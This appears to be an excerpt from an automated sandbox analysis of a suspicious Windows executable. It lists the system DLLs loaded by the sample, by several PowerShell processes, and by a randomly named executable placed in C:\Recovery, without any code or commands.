Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\kQyd2z80gD.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: mscoree.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: apphelp.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: version.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: uxtheme.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: wldp.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: profapi.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: sspicli.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: amsi.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: userenv.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: rasapi32.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: rasman.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: rtutils.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: mswsock.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: winhttp.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: iphlpapi.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: dhcpcsvc.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: dnsapi.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: winnsi.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: rasadhlp.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: fwpuclnt.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: wbemcomn.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: winmm.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: winmmbase.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: mmdevapi.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: devobj.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: ksuser.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: avrt.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: audioses.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: powrprof.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: umpdc.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: msacm32.dll
Source: C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe	Section loaded: midimap.dll
